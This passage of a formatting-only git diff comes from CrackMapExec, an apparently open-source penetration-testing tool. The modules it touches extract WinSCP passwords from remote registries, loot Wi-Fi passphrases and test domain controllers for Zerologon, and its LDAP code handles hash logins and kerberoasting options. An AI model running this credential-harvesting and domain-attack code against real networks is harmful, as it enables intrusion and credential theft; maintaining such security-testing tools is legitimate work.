ans["phkResult"] - userProfilePath = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath" - )[1].split("\x00")[:-1][0] + userProfilePath = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath")[1].split("\x00")[:-1][0] rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) self.userDict[userObject] = userProfilePath.split("\\")[-1] finally: @@ -144,24 +141,14 @@ class CMEModule: ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, - userObject - + "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\" - + sessionName, + userObject + "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\" + sessionName, ) keyHandle = ans["phkResult"] - hostName = unquote( - rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "HostName" - )[1].split("\x00")[:-1][0] - ) - userName = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "UserName" - )[1].split("\x00")[:-1][0] + hostName = unquote(rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "HostName")[1].split("\x00")[:-1][0]) + userName = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UserName")[1].split("\x00")[:-1][0] try: - password = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "Password" - )[1].split("\x00")[:-1][0] + password = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "Password")[1].split("\x00")[:-1][0] except: 
context.log.debug("Session found but no Password is stored!") password = "" @@ -203,11 +190,7 @@ class CMEModule: # Get User Names userNames = [] for i in range(users): - userNames.append( - rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)[ - "lpNameOut" - ].split("\x00")[:-1][0] - ) + userNames.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)["lpNameOut"].split("\x00")[:-1][0]) rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) # Filter legit users in regex @@ -247,11 +230,7 @@ class CMEModule: # Get User Names for i in range(users): - userObjects.append( - rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)[ - "lpNameOut" - ].split("\x00")[:-1][0] - ) + userObjects.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)["lpNameOut"].split("\x00")[:-1][0]) rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) except: context.log.fail("Error handling Users in registry") @@ -276,23 +255,18 @@ class CMEModule: ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, - "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" - + userObject, + "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" + userObject, ) keyHandle = ans["phkResult"] - userProfilePath = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath" - )[1].split("\x00")[:-1][0] + userProfilePath = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath")[1].split("\x00")[:-1][0] rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) # Load Profile ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp) regHandle = ans["phKey"] - ans = rrp.hBaseRegOpenKey( - remoteOps._RemoteOperations__rrp, regHandle, "" - ) + ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "") keyHandle = ans["phkResult"] context.log.debug("LOAD USER INTO REGISTRY: " + userObject) @@ -324,9 +298,7 @@ class CMEModule: for userObject in unloadedUserObjects: context.log.debug("UNLOAD USER FROM REGISTRY: " + userObject) try: - rrp.hBaseRegUnLoadKey( - remoteOps._RemoteOperations__rrp, keyHandle, userObject - ) + rrp.hBaseRegUnLoadKey(remoteOps._RemoteOperations__rrp, keyHandle, userObject) except: traceback.print_exc() rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) @@ -344,14 +316,11 @@ class CMEModule: ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, - userObject - + "\\Software\\Martin Prikryl\\WinSCP 2\\Configuration\\Security", + userObject + "\\Software\\Martin Prikryl\\WinSCP 2\\Configuration\\Security", ) keyHandle = ans["phkResult"] - useMasterPassword = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "UseMasterPassword" - )[1] + useMasterPassword = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseMasterPassword")[1] rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) finally: remoteOps.finish() @@ -369,9 +338,7 @@ class CMEModule: self.userObjectToNameMapper(context, connection, allUserObjects) # Users which must be loaded into registry: - unloadedUserObjects = list( - set(userObjects).symmetric_difference(set(allUserObjects)) - ) + unloadedUserObjects = list(set(userObjects).symmetric_difference(set(allUserObjects))) self.loadMissingUsers(context, connection, unloadedUserObjects) # Retrieve how many sessions are stored in registry from each UserObject @@ -386,24 +353,14 @@ class CMEModule: ) keyHandle = ans["phkResult"] 
- data = rrp.hBaseRegQueryInfoKey( - remoteOps._RemoteOperations__rrp, keyHandle - ) + data = rrp.hBaseRegQueryInfoKey(remoteOps._RemoteOperations__rrp, keyHandle) sessions = data["lpcSubKeys"] - context.log.success( - 'Found {} sessions for user "{}" in registry!'.format( - sessions - 1, self.userDict[userObject] - ) - ) + context.log.success('Found {} sessions for user "{}" in registry!'.format(sessions - 1, self.userDict[userObject])) # Get Session Names sessionNames = [] for i in range(sessions): - sessionNames.append( - rrp.hBaseRegEnumKey( - remoteOps._RemoteOperations__rrp, keyHandle, i - )["lpNameOut"].split("\x00")[:-1][0] - ) + sessionNames.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)["lpNameOut"].split("\x00")[:-1][0]) rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) sessionNames.remove("Default%20Settings") @@ -414,17 +371,11 @@ class CMEModule: for sessionName in sessionNames: self.printCreds( context, - self.registrySessionExtractor( - context, connection, userObject, sessionName - ), + self.registrySessionExtractor(context, connection, userObject, sessionName), ) except DCERPCException as e: if str(e).find("ERROR_FILE_NOT_FOUND"): - context.log.debug( - "No WinSCP config found in registry for user {}".format( - userObject - ) - ) + context.log.debug("No WinSCP config found in registry for user {}".format(userObject)) except Exception: context.log.fail("Unexpected error:") traceback.print_exc() @@ -432,9 +383,7 @@ class CMEModule: except DCERPCException as e: # Error during registry query if str(e).find("rpc_s_access_denied"): - context.log.fail( - "Error: rpc_s_access_denied. Seems like you don't have enough privileges to read the registry." - ) + context.log.fail("Error: rpc_s_access_denied. Seems like you don't have enough privileges to read the registry.") except: context.log.fail("UNEXPECTED ERROR:") traceback.print_exc() @@ -475,17 +424,11 @@ class CMEModule: context.log.success("Found config file! Extracting credentials...") self.decodeConfigFile(context, confFile) except: - context.log.fail( - "Error! No config file found at {}".format(self.filepath) - ) + context.log.fail("Error! No config file found at {}".format(self.filepath)) traceback.print_exc() else: - context.log.display( - "Looking for WinSCP creds in User documents and AppData..." - ) - output = connection.execute( - 'powershell.exe "Get-LocalUser | Select name"', True - ) + context.log.display("Looking for WinSCP creds in User documents and AppData...") + output = connection.execute('powershell.exe "Get-LocalUser | Select name"', True) users = [] for row in output.split("\r\n"): users.append(row.strip()) @@ -503,15 +446,9 @@ class CMEModule: buf = BytesIO() connection.conn.getFile(self.share, path, buf.write) confFile = buf.getvalue().decode() - context.log.success( - 'Found config file at "{}"! Extracting credentials...'.format( - self.share + path - ) - ) + context.log.success('Found config file at "{}"! 
Extracting credentials...'.format(self.share + path)) except: - context.log.debug( - 'No config file found at "{}"'.format(self.share + path) - ) + context.log.debug('No config file found at "{}"'.format(self.share + path)) if confFile: self.decodeConfigFile(context, confFile) diff --git a/cme/modules/wireless.py b/cme/modules/wireless.py index 290787d3..088d00d0 100644 --- a/cme/modules/wireless.py +++ b/cme/modules/wireless.py @@ -63,11 +63,7 @@ class CMEModule: context.log.fail("No masterkeys looted") return - context.log.success( - "Got {} decrypted masterkeys. Looting Wifi interfaces".format( - highlight(len(masterkeys)) - ) - ) + context.log.success("Got {} decrypted masterkeys. Looting Wifi interfaces".format(highlight(len(masterkeys)))) try: # Collect Chrome Based Browser stored secrets @@ -89,11 +85,6 @@ class CMEModule: ) ) except: - context.log.highlight( - "[%s] %s - Passphrase: %s" - % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password) - ) + context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password)) else: - context.log.highlight( - "[WPA-EAP] %s - %s" % (wifi_cred.ssid, wifi_cred.eap_type) - ) + context.log.highlight("[WPA-EAP] %s - %s" % (wifi_cred.ssid, wifi_cred.eap_type)) diff --git a/cme/modules/zerologon.py b/cme/modules/zerologon.py index 12e23ab9..527f8f05 100644 --- a/cme/modules/zerologon.py +++ b/cme/modules/zerologon.py @@ -14,9 +14,7 @@ MAX_ATTEMPTS = 2000 # False negative chance: 0.04% class CMEModule: name = "zerologon" - description = ( - "Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472" - ) + description = "Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = False @@ -30,13 +28,9 @@ class CMEModule: def on_login(self, context, connection): self.context = context - if self.perform_attack( - "\\\\" + connection.hostname, connection.host, connection.hostname - ): + if self.perform_attack("\\\\" + connection.hostname, connection.host, connection.hostname): self.context.log.highlight("VULNERABLE") - self.context.log.highlight( - "Next step: https://github.com/dirkjanm/CVE-2020-1472" - ) + self.context.log.highlight("Next step: https://github.com/dirkjanm/CVE-2020-1472") try: host = self.context.db.get_hosts(connection.host)[0] self.context.db.add_host( @@ -61,18 +55,13 @@ class CMEModule: rpc_con.connect() rpc_con.bind(nrpc.MSRPC_UUID_NRPC) for attempt in range(0, MAX_ATTEMPTS): - result = try_zero_authenticate( - rpc_con, dc_handle, dc_ip, target_computer - ) + result = try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer) if result: return True else: self.context.log.debug("\nAttack failed. Target is probably patched.") except DCERPCException as e: - self.context.log.fail( - f"Error while connecting to host: DCERPCException, " - f"which means this is probably not a DC!" - ) + self.context.log.fail(f"Error while connecting to host: DCERPCException, " f"which means this is probably not a DC!") def fail(msg): @@ -95,9 +84,7 @@ def try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer): flags = 0x212FFFFF # Send challenge and authentication request. 
- nrpc.hNetrServerReqChallenge( - rpc_con, dc_handle + "\x00", target_computer + "\x00", plaintext - ) + nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + "\x00", target_computer + "\x00", plaintext) try: server_auth = nrpc.hNetrServerAuthenticate3( rpc_con, diff --git a/cme/parsers/ip.py b/cme/parsers/ip.py index 48ed14e9..9a1371e9 100755 --- a/cme/parsers/ip.py +++ b/cme/parsers/ip.py @@ -19,10 +19,7 @@ def parse_targets(target): for ip in ip_range: yield str(ip) else: - if ( - ip_interface(target).ip.version == 6 - and ip_address(target).is_link_local - ): + if ip_interface(target).ip.version == 6 and ip_address(target).is_link_local: yield str(target) else: for ip in ip_network(target, strict=False): diff --git a/cme/parsers/nmap.py b/cme/parsers/nmap.py index 178a41d8..b7abb033 100644 --- a/cme/parsers/nmap.py +++ b/cme/parsers/nmap.py @@ -29,9 +29,7 @@ def parse_nmap_xml(nmap_output_file, protocol): ip = host["address"][0]["@addr"] for port in host["ports"]["port"]: if port["state"]["@state"] == "open": - if "service" in port and ( - port["service"]["@name"] in protocol_dict[protocol]["services"] - ): + if "service" in port and (port["service"]["@name"] in protocol_dict[protocol]["services"]): if ip not in targets: targets.append(ip) elif port["@portid"] in protocol_dict[protocol]["ports"]: diff --git a/cme/paths.py b/cme/paths.py index 23d17dd0..0642994b 100644 --- a/cme/paths.py +++ b/cme/paths.py @@ -7,9 +7,7 @@ TMP_PATH = os.path.join("/tmp", "cme_hosted") if os.name == "nt": TMP_PATH = os.getenv("LOCALAPPDATA") + "\\Temp\\cme_hosted" if hasattr(sys, "getandroidapilevel"): - TMP_PATH = os.path.join( - "/data", "data", "com.termux", "files", "usr", "tmp", "cme_hosted" - ) + TMP_PATH = os.path.join("/data", "data", "com.termux", "files", "usr", "tmp", "cme_hosted") WS_PATH = os.path.join(CME_PATH, "workspaces") CERT_PATH = os.path.join(CME_PATH, "cme.pem") CONFIG_PATH = os.path.join(CME_PATH, "cme.conf") diff --git a/cme/protocols/ftp.py b/cme/protocols/ftp.py index 9cfd8bc2..9ff36dbf 100644 --- a/cme/protocols/ftp.py +++ b/cme/protocols/ftp.py @@ -9,17 +9,13 @@ from ftplib import FTP, error_reply, error_temp, error_perm, error_proto class ftp(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - ftp_parser = parser.add_parser( - "ftp", help="own stuff using FTP", parents=[std_parser, module_parser] - ) + ftp_parser = parser.add_parser("ftp", help="own stuff using FTP", parents=[std_parser, module_parser]) ftp_parser.add_argument( "--no-bruteforce", action="store_true", help="No spray when using file for username and password (user1 => password1, user2 => password2", ) - ftp_parser.add_argument( - "--port", type=int, default=21, help="FTP port (default: 21)" - ) + ftp_parser.add_argument("--port", type=int, default=21, help="FTP port (default: 21)") ftp_parser.add_argument( "--continue-on-success", action="store_true", diff --git a/cme/protocols/ftp/database.py b/cme/protocols/ftp/database.py index cacb6666..abd8cf3c 100644 --- a/cme/protocols/ftp/database.py +++ b/cme/protocols/ftp/database.py @@ -47,19 +47,10 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.CredentialsTable = Table( - "credentials", self.metadata, autoload_with=self.db_engine - ) - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) except 
(NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): diff --git a/cme/protocols/ftp/db_navigator.py b/cme/protocols/ftp/db_navigator.py index b1afbf92..36777af1 100644 --- a/cme/protocols/ftp/db_navigator.py +++ b/cme/protocols/ftp/db_navigator.py @@ -6,12 +6,7 @@ from cme.cmedb import DatabaseNavigator, print_help class navigator(DatabaseNavigator): def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/ldap.py b/cme/protocols/ldap.py index 18b2ab15..4cd20007 100644 --- a/cme/protocols/ldap.py +++ b/cme/protocols/ldap.py @@ -139,9 +139,7 @@ def get_conditional_action(baseAction): def __call__(self, parser, namespace, values, option_string=None): for x in self.make_required: x.required = True - super(ConditionalAction, self).__call__( - parser, namespace, values, option_string - ) + super(ConditionalAction, self).__call__(parser, namespace, values, option_string) return ConditionalAction @@ -171,9 +169,7 @@ class ldap(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - ldap_parser = parser.add_parser( - "ldap", help="own stuff using LDAP", parents=[std_parser, module_parser] - ) + ldap_parser = parser.add_parser("ldap", help="own stuff using LDAP", parents=[std_parser, module_parser]) ldap_parser.add_argument( "-H", "--hash", @@ -223,15 +219,9 @@ class ldap(connection): ) no_smb_arg.make_required = [domain_arg] - egroup = ldap_parser.add_argument_group( - "Retrevie hash on the remote DC", "Options to get hashes from Kerberos" - ) - egroup.add_argument( - "--asreproast", help="Get AS_REP response ready to crack with hashcat" - ) - egroup.add_argument( - "--kerberoasting", help="Get TGS ticket ready to crack with hashcat" - ) + egroup = ldap_parser.add_argument_group("Retrevie hash on the remote DC", "Options to get hashes from Kerberos") + egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat") + egroup.add_argument("--kerberoasting", help="Get TGS ticket ready to crack with hashcat") vgroup = ldap_parser.add_argument_group( "Retrieve useful information on the domain", @@ -252,34 +242,20 @@ class ldap(connection): action="store_true", help="Get objets that had the value adminCount=1", ) - vgroup.add_argument( - "--users", action="store_true", help="Enumerate enabled domain users" - ) - vgroup.add_argument( - "--groups", action="store_true", help="Enumerate domain groups" - ) + 
vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users") + vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups") vgroup.add_argument("--get-sid", action="store_true", help="Get domain sid") - ggroup = ldap_parser.add_argument_group( - "Retrevie gmsa on the remote DC", "Options to play with gmsa" - ) - ggroup.add_argument( - "--gmsa", action="store_true", help="Enumerate GMSA passwords" - ) + ggroup = ldap_parser.add_argument_group("Retrevie gmsa on the remote DC", "Options to play with gmsa") + ggroup.add_argument("--gmsa", action="store_true", help="Enumerate GMSA passwords") ggroup.add_argument( "--gmsa-convert-id", help="Get the secret name of specific gmsa or all gmsa if no gmsa provided", ) - ggroup.add_argument( - "--gmsa-decrypt-lsa", help="Decrypt the gmsa encrypted value from LSA" - ) + ggroup.add_argument("--gmsa-decrypt-lsa", help="Decrypt the gmsa encrypted value from LSA") - bgroup = ldap_parser.add_argument_group( - "Bloodhound scan", "Options to play with bloodhoud" - ) - bgroup.add_argument( - "--bloodhound", action="store_true", help="Perform bloodhound scan" - ) + bgroup = ldap_parser.add_argument_group("Bloodhound scan", "Options to play with bloodhoud") + bgroup.add_argument("--bloodhound", action="store_true", help="Perform bloodhound scan") bgroup.add_argument("-ns", "--nameserver", help="Custom DNS IP") bgroup.add_argument( "-c", @@ -313,9 +289,7 @@ class ldap(connection): if proto == "ldaps": self.logger.debug(f"LDAPs connection to {ldap_url} failed - {e}") # https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority - self.logger.debug( - f"Even if the port is open, LDAPS may not be configured" - ) + self.logger.debug(f"Even if the port is open, LDAPS may not be configured") else: self.logger.debug(f"LDAP connection to {ldap_url} failed: {e}") return [None, None, None] @@ -348,9 +322,7 @@ class ldap(connection): self.logger.info(f"Skipping item, cannot process due to error {e}") except OSError as e: return [None, None, None] - self.logger.debug( - f"Target: {target}; target_domain: {target_domain}; base_dn: {base_dn}" - ) + self.logger.debug(f"Target: {target}; target_domain: {target_domain}; base_dn: {base_dn}") return [target, target_domain, base_dn] def get_os_arch(self): @@ -389,9 +361,7 @@ class ldap(connection): if search_result["resultCode"] == ldapasn1_impacket.ResultCode("success"): response_value = search_result["responseValue"] if response_value.hasValue(): - value = response_value.asOctets().decode(response_value.encoding)[ - 2: - ] + value = response_value.asOctets().decode(response_value.encoding)[2:] return value.split("\\")[1] return "" @@ -417,11 +387,7 @@ class ldap(connection): self.domain = self.conn.getServerDNSDomainName() self.hostname = self.conn.getServerName() self.server_os = self.conn.getServerOS() - self.signing = ( - self.conn.isSigningRequired() - if self.smbv1 - else self.conn._SMBConnection._Connection["RequireSigning"] - ) + self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection["RequireSigning"] self.os_arch = self.get_os_arch() if not self.domain: @@ -440,9 +406,7 @@ class ldap(connection): # Re-connect since we logged off self.create_conn_obj() - self.output_filename = os.path.expanduser( - f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = 
os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") self.output_filename = self.output_filename.replace(":", "-") def print_host_info(self): @@ -455,9 +419,7 @@ class ldap(connection): else: self.logger.extra["protocol"] = "SMB" if not self.no_ntlm else "LDAP" self.logger.extra["port"] = "445" if not self.no_ntlm else "389" - self.logger.display( - f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) (signing:{self.signing}) (SMBv1:{self.smbv1})" - ) + self.logger.display(f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) (signing:{self.signing}) (SMBv1:{self.smbv1})") self.logger.extra["protocol"] = "LDAP" # self.logger.display(self.endpoint) return True @@ -529,17 +491,13 @@ class ldap(connection): self.check_if_admin() - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" out = f"{domain}\\{self.username}{used_ccache} {self.mark_pwned()}" # out = f"{domain}\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')}" self.logger.extra["protocol"] = "LDAP" - self.logger.extra["port"] = ( - "636" if (self.args.gmsa or self.args.port == 636) else "389" - ) + self.logger.extra["port"] = "636" if (self.args.gmsa or self.args.port == 636) else "389" self.logger.success(out) if not self.args.local_auth: @@ -555,9 +513,7 @@ class ldap(connection): return False except SessionError as e: error, desc = e.getErrorString() - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" self.logger.fail( f"{self.domain}\\{self.username}{used_ccache} {str(error)}", color="magenta" if error in ldap_error_status else "red", @@ -576,9 +532,7 @@ class ldap(connection): # Connect to LDAPS ldaps_url = f"ldaps://{self.target}" self.logger.info(f"Connecting to {ldaps_url} - {self.baseDN} [2]") - self.ldapConnection = ldap_impacket.LDAPConnection( - ldaps_url, self.baseDN - ) + self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN) self.ldapConnection.kerberosLogin( username, password, @@ -603,9 +557,7 @@ class ldap(connection): self.logger.success(out) if not self.args.local_auth: - add_user_bh( - self.username, self.domain, self.logger, self.config - ) + add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except ldap_impacket.LDAPSessionError as e: @@ -649,18 +601,14 @@ class ldap(connection): ldap_url = f"{proto}://{self.target}" self.logger.debug(f"Connecting to {ldap_url} - {self.baseDN} [3]") self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN) - self.ldapConnection.login( - self.username, self.password, self.domain, self.lmhash, self.nthash - ) + self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash) self.check_if_admin() # Prepare success credential text out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}" self.logger.extra["protocol"] = "LDAP" - self.logger.extra["port"] = ( - "636" if (self.args.gmsa or self.args.port == 636) else "389" - ) + 
self.logger.extra["port"] = "636" if (self.args.gmsa or self.args.port == 636) else "389" self.logger.success(out) if not self.args.local_auth: @@ -674,9 +622,7 @@ class ldap(connection): # Connect to LDAPS ldaps_url = f"{proto}://{self.target}" self.logger.info(f"Connecting to {ldaps_url} - {self.baseDN} [4]") - self.ldapConnection = ldap_impacket.LDAPConnection( - ldaps_url, self.baseDN - ) + self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN) self.ldapConnection.login( self.username, self.password, @@ -693,32 +639,24 @@ class ldap(connection): self.logger.success(out) if not self.args.local_auth: - add_user_bh( - self.username, self.domain, self.logger, self.config - ) + add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except ldap_impacket.LDAPSessionError as e: error_code = str(e).split()[-2][:-1] self.logger.fail( f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}", - color="magenta" - if (error_code in ldap_error_status and error_code != 1) - else "red", + color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red", ) else: error_code = str(e).split()[-2][:-1] self.logger.fail( f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}", - color="magenta" - if (error_code in ldap_error_status and error_code != 1) - else "red", + color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red", ) return False except OSError as e: - self.logger.fail( - f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}") return False def hash_login(self, domain, username, ntlm_hash): @@ -756,17 +694,13 @@ class ldap(connection): ldaps_url = f"{proto}://{self.target}" self.logger.info(f"Connecting to {ldaps_url} - {self.baseDN}") self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN) - self.ldapConnection.login( - self.username, self.password, self.domain, self.lmhash, self.nthash - ) + self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash) self.check_if_admin() # Prepare success credential text out = f"{domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}" self.logger.extra["protocol"] = "LDAP" - self.logger.extra["port"] = ( - "636" if (self.args.gmsa or self.args.port == 636) else "389" - ) + self.logger.extra["port"] = "636" if (self.args.gmsa or self.args.port == 636) else "389" self.logger.success(out) if not self.args.local_auth: @@ -779,9 +713,7 @@ class ldap(connection): # We need to try SSL ldaps_url = f"{proto}://{self.target}" self.logger.debug(f"Connecting to {ldaps_url} - {self.baseDN}") - self.ldapConnection = ldap_impacket.LDAPConnection( - ldaps_url, self.baseDN - ) + self.ldapConnection = 
ldap_impacket.LDAPConnection(ldaps_url, self.baseDN) self.ldapConnection.login( self.username, self.password, @@ -798,40 +730,30 @@ class ldap(connection): self.logger.success(out) if not self.args.local_auth: - add_user_bh( - self.username, self.domain, self.logger, self.config - ) + add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except ldap_impacket.LDAPSessionError as e: error_code = str(e).split()[-2][:-1] self.logger.fail( f"{self.domain}\\{self.username}:{nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}", - color="magenta" - if (error_code in ldap_error_status and error_code != 1) - else "red", + color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red", ) else: error_code = str(e).split()[-2][:-1] self.logger.fail( f"{self.domain}\\{self.username}:{nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}", - color="magenta" - if (error_code in ldap_error_status and error_code != 1) - else "red", + color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red", ) return False except OSError as e: - self.logger.fail( - f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}") return False def create_smbv1_conn(self): self.logger.debug(f"Creating smbv1 connection object") try: - self.conn = SMBConnection( - self.host, self.host, None, 445, preferredDialect=SMB_DIALECT - ) + self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT) self.smbv1 = True if self.conn: self.logger.debug(f"SMBv1 Connection successful") @@ -885,19 +807,8 @@ class ldap(connection): identifier_authority = hex(identifier_authority) # loop over the count of small endians - sub_authority = "-" + "-".join( - [ - str( - int.from_bytes( - sid[8 + (i * 4) : 12 + (i * 4)], byteorder="little" - ) - ) - for i in range(sub_authorities) - ] - ) - object_sid = ( - "S-" + str(revision) + "-" + str(identifier_authority) + sub_authority - ) + sub_authority = "-" + "-".join([str(int.from_bytes(sid[8 + (i * 4) : 12 + (i * 4)], byteorder="little")) for i in range(sub_authorities)]) + object_sid = "S-" + str(revision) + "-" + str(identifier_authority) + sub_authority return object_sid except Exception: pass @@ -916,15 +827,7 @@ class ldap(connection): self.sid_domain = "-".join(sid.split("-")[:-1]) # 2. 
